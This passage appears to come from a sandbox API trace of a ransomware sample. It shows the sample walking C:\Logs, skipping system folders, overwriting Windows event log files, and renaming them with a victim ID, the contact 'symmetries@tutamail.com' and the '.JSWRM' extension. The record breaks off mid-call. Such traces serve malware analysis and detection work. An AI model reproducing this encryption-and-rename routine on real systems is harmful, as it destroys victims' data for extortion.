8 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0065.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0065.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0065.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.023] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-deployment.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.024] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cAlternateFileName="MI8196~1.EVT")) returned 1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2=".") returned 1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="..") returned 1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="...") returned 1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="windows") returned -1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="recovery") returned -1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="perflogs") returned -1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="documents and settings") returned 1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="system volume information") returned -1 [0065.024] lstrcmpiW (lpString1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpString2="msocache") returned -1 [0065.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0065.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchWideChar=56, lpMultiByteStr=0x20e418, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpUsedDefaultChar=0x0) returned 56 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0065.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0065.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", cchWideChar=56, lpMultiByteStr=0x20de78, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", lpUsedDefaultChar=0x0) returned 56 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0065.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0065.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.025] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.025] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.025] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.025] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.030] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.030] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.031] CloseHandle (hObject=0x450) returned 1 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0065.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0065.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0065.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0065.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.032] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0065.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0065.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.033] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cAlternateFileName="MIE36C~1.EVT")) returned 1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2=".") returned 1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="..") returned 1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="...") returned 1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="windows") returned -1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="recovery") returned -1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="perflogs") returned -1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="system volume information") returned -1 [0065.033] lstrcmpiW (lpString1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpString2="msocache") returned -1 [0065.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0065.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0065.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchWideChar=46, lpMultiByteStr=0x1f8328, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpUsedDefaultChar=0x0) returned 46 [0065.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0065.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0065.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0065.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", cchWideChar=46, lpMultiByteStr=0x1f84e8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppModel-Runtime%4Admin.evtx", lpUsedDefaultChar=0x0) returned 46 [0065.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0065.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0065.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0065.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0065.034] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.034] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.034] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.034] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.040] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.040] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.040] CloseHandle (hObject=0x450) returned 1 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0065.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0065.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0065.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f720 [0065.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.042] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0065.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0065.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0065.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.043] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx", cAlternateFileName="MIC5CB~1.EVT")) returned 1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2=".") returned 1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="..") returned 1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="...") returned 1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="windows") returned -1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="recovery") returned -1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="perflogs") returned -1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="system volume information") returned -1 [0065.043] lstrcmpiW (lpString1="Microsoft-Windows-AppReadiness%4Admin.evtx", lpString2="msocache") returned -1 [0065.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0065.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Admin.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0065.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Admin.evtx", cchWideChar=42, lpMultiByteStr=0x1f8328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppReadiness%4Admin.evtx", lpUsedDefaultChar=0x0) returned 42 [0065.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0065.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0065.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Admin.evtx", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0065.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppReadiness%4Admin.evtx", cchWideChar=42, lpMultiByteStr=0x1f84e8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppReadiness%4Admin.evtx", lpUsedDefaultChar=0x0) returned 42 [0065.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0065.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0065.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0065.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0065.044] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.044] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.044] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.044] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.049] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.049] WriteFile (in: hFile=0x450, 